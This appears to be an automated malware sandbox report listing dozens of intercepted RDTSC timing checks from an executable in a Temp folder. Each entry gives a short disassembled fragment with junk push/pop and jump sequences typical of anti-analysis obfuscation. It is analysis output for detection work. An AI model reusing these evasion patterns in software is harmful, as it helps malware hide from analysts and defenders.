Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370099 second address: 537009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 537009F second address: 53700C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov dh, ch 0x0000000c movsx edx, ax 0x0000000f popad 0x00000010 mov dword ptr [esp], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F34D8F44CC0h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53700C6 second address: 53700D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53700D5 second address: 53700DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53700DB second address: 53700DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53700DF second address: 5370127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F34D8F44CC9h 0x00000011 pushfd 0x00000012 jmp 00007F34D8F44CC0h 0x00000017 add si, A818h 0x0000001c jmp 00007F34D8F44CBBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370127 second address: 537018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219DFh 0x00000009 sbb ch, FFFFFFDEh 0x0000000c jmp 00007F34D94219E9h 0x00000011 popfd 0x00000012 call 00007F34D94219E0h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebx 0x0000001e jmp 00007F34D94219E1h 0x00000023 mov ebx, dword ptr [ebp+10h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edi, cx 0x0000002c mov dx, ax 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 537018C second address: 5370192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370192 second address: 5370196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 537027E second address: 5370296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370296 second address: 53702AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53702AF second address: 53702B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53702B3 second address: 53702CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53702CE second address: 53702D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53702D4 second address: 5370370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F354AFDFD06h 0x00000011 pushad 0x00000012 mov ax, bx 0x00000015 popad 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F34D94219E3h 0x00000024 jmp 00007F34D94219E3h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F34D94219E8h 0x00000030 sub si, 7888h 0x00000035 jmp 00007F34D94219DBh 0x0000003a popfd 0x0000003b popad 0x0000003c je 00007F354AFDFCB6h 0x00000042 pushad 0x00000043 mov si, 561Bh 0x00000047 pushad 0x00000048 push ecx 0x00000049 pop edi 0x0000004a mov esi, 633D75C9h 0x0000004f popad 0x00000050 popad 0x00000051 mov edx, dword ptr [esi+44h] 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F34D94219DBh 0x0000005b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370370 second address: 5370376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370376 second address: 5370387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, ecx 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370387 second address: 53703A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC7h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606BE second address: 53606C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606C2 second address: 53606C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606C8 second address: 53606CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606CE second address: 53606D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53606D2 second address: 536077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F34D94219E1h 0x00000013 xor si, A6D6h 0x00000018 jmp 00007F34D94219E1h 0x0000001d popfd 0x0000001e mov edx, ecx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov ecx, 67A74B3Fh 0x00000028 mov esi, 0C4F5C5Bh 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov esi, 545AFBD3h 0x00000036 pushad 0x00000037 mov di, ax 0x0000003a pushfd 0x0000003b jmp 00007F34D94219E2h 0x00000040 sub eax, 62ED9758h 0x00000046 jmp 00007F34D94219DBh 0x0000004b popfd 0x0000004c popad 0x0000004d popad 0x0000004e and esp, FFFFFFF8h 0x00000051 jmp 00007F34D94219E6h 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536077E second address: 5360782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360782 second address: 5360786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360786 second address: 536078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536078C second address: 53607D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F34D94219DBh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx ebx, si 0x00000016 pushfd 0x00000017 jmp 00007F34D94219DCh 0x0000001c add ah, 00000078h 0x0000001f jmp 00007F34D94219DBh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53607D4 second address: 5360816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F34D8F44CBEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F34D8F44CBCh 0x00000018 mov esi, 48DA2711h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360816 second address: 536081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536081C second address: 536085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F34D8F44CBEh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F34D8F44CBAh 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536085B second address: 5360861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360861 second address: 5360867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360867 second address: 536086B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536086B second address: 53608A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007F34D8F44CC1h 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608A5 second address: 53608AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608AB second address: 53608E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F354AB0A786h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx ebx, si 0x00000017 call 00007F34D8F44CC4h 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608E0 second address: 53608E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608E6 second address: 53608EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608EA second address: 53608EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53608EE second address: 536091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F34D8F44CC6h 0x00000014 mov ecx, esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 movzx ecx, dx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536091B second address: 536092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 je 00007F354AFE7456h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536092F second address: 5360935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360935 second address: 536093B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536093B second address: 5360977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 jmp 00007F34D8F44CBEh 0x00000017 jne 00007F354AB0A709h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F34D8F44CBAh 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360977 second address: 536097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536097B second address: 5360981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360981 second address: 53609E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F34D94219E0h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F34D94219E0h 0x00000017 push eax 0x00000018 jmp 00007F34D94219DBh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D94219E6h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop edx 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53609E0 second address: 5360A1B instructions: 0x00000000 rdtsc 0x00000002 mov ax, ECFFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F34D8F44CC1h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007F34D8F44CC6h 0x0000001d pop ecx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360A1B second address: 5360A5A instructions: 0x00000000 rdtsc 0x00000002 mov dh, 8Dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+14h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F34D94219DFh 0x00000013 xor cx, 138Eh 0x00000018 jmp 00007F34D94219E9h 0x0000001d popfd 0x0000001e mov ch, 9Eh 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360A84 second address: 5360ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 33h 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c jmp 00007F34D8F44CC4h 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push ebx 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007F34D8F44CC9h 0x0000001d xor ax, CBE6h 0x00000022 jmp 00007F34D8F44CC1h 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360ADC second address: 5360AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360AEC second address: 5360B03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esp, ebp 0x0000000a pushad 0x0000000b mov dl, B7h 0x0000000d popad 0x0000000e pop ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov bx, si 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360B03 second address: 5360B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1F150 second address: C1F156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1F156 second address: C1F15A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370D90 second address: 5370D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370D94 second address: 5370D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370D9A second address: 5370DA0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370DA0 second address: 5370DA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370B0B second address: 5370B17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370B17 second address: 5370B1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53F07E4 second address: 53F07EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53F07EA second address: 53F07F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DBh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53F07F9 second address: 53F07FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0903 second address: 53E0926 instructions: 0x00000000 rdtsc 0x00000002 mov si, FFEDh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 mov ax, 950Fh 0x0000000d push ecx 0x0000000e pop edx 0x0000000f popad 0x00000010 popad 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F34D94219DDh 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0926 second address: 53E092C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E092C second address: 53E0930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0730 second address: 53E074A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E074A second address: 53E0752 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380270 second address: 5380280 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBBh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380280 second address: 5380286 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380286 second address: 5380295 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380295 second address: 53802A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53802A8 second address: 53802C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53802C0 second address: 53802C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53802C4 second address: 5380316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F34D8F44CC7h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F34D8F44CC6h 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F34D8F44CC7h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380316 second address: 538032E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538032E second address: 5380332 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0B82 second address: 53E0B88 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0B88 second address: 53E0B99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53E0B99 second address: 53E0BAB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov esi, edi 0x0000000e movsx edx, si 0x00000011 popad 0x00000012 rdtsc
